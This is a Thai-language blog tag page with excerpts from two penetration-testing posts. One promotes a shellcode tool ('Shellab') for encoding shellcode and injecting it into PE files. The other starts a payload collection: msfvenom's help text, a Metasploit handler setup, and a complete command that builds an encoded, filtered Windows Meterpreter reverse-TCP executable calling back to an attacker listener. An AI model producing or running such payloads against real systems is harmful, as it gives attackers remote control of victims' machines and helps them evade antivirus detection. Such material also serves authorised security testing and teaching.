Posts by tag
msfvenom
โดยปกติแล้วเรามักจะใช้งาน msfvenom ซึ่งเป็นเครื่องมือตัวหนึ่งในชุด Metasploit Framework แต่ทีนี้ถ้าหากเราต้องการจะหาเครื่องมือซักตัวที่ไม่ผูกกับ framework ตัวไหนเลยล่ะ จะเป็นตัวไหนดี พอดีผมเจอ “Shellab” มาก็เลยเอามาแชร์ต่อครับ เพราะตัว shellab นั้นทำงานได้ทุกอย่างเหมือนกับตัว Msfvenom เลยนั่นเอง โดย Shellab ทำได้ทั้ง
หากใครสนใจก็ไปตามใน link นี้ได้เลยครับ Source:: Shellab
1 2 3 4 5 6 7 |
- Encode shellcode with custom encoder - Generate stagers and egghunters (including sandwich and omelette egghunter) - Inject shellcode into PE files - Run shellcode on Linux - Remove bad characters and null-bytes Perform experimental size reduction (by instructions replacement) - Export shellcode in different executable formats (C, C#, Python, Powershell, hex, raw etc.) - Add custom instructions, NOP slides and specific system calls |
เนื่องด้วยช่วงนี้ผมสร้าง payload ด้วย metasploit บ่อยในหลายๆสกุล ก็เลยขอโพสต์รวม payload ทั้งหมดที่สร้างด้วย Msfvenom เลยละกันครับ 1. ดู help ของ msfvenom
2. การสร้าง listener
3. payload generate ต่างๆ Windows
Windows – add user…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Options: -l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, formats, all -p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom --list-options List --payload <value>'s standard, advanced and evasion options -f, --format <format> Output format (use --list formats to list) -e, --encoder <encoder> The encoder to use (use --list encoders to list) --smallest Generate the smallest possible payload using all available encoders -a, --arch <arch> The architecture to use for --payload and --encoders --platform <platform> The platform for --payload (use --list platforms to list) -o, --out <path> Save the payload to a file -b, --bad-chars <list> Characters to avoid example: '\x00\xff' -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the --template behaviour and inject the payload as a new thread -v, --var-name <value> Specify a custom variable name to use for certain output formats -t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) -h, --help Show this message |
1 2 3 4 5 |
msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set lport 443 msf > set lhost 10.211.55.50 msf > exploit -j |
1 |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.211.55.50 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe |
Recent Comments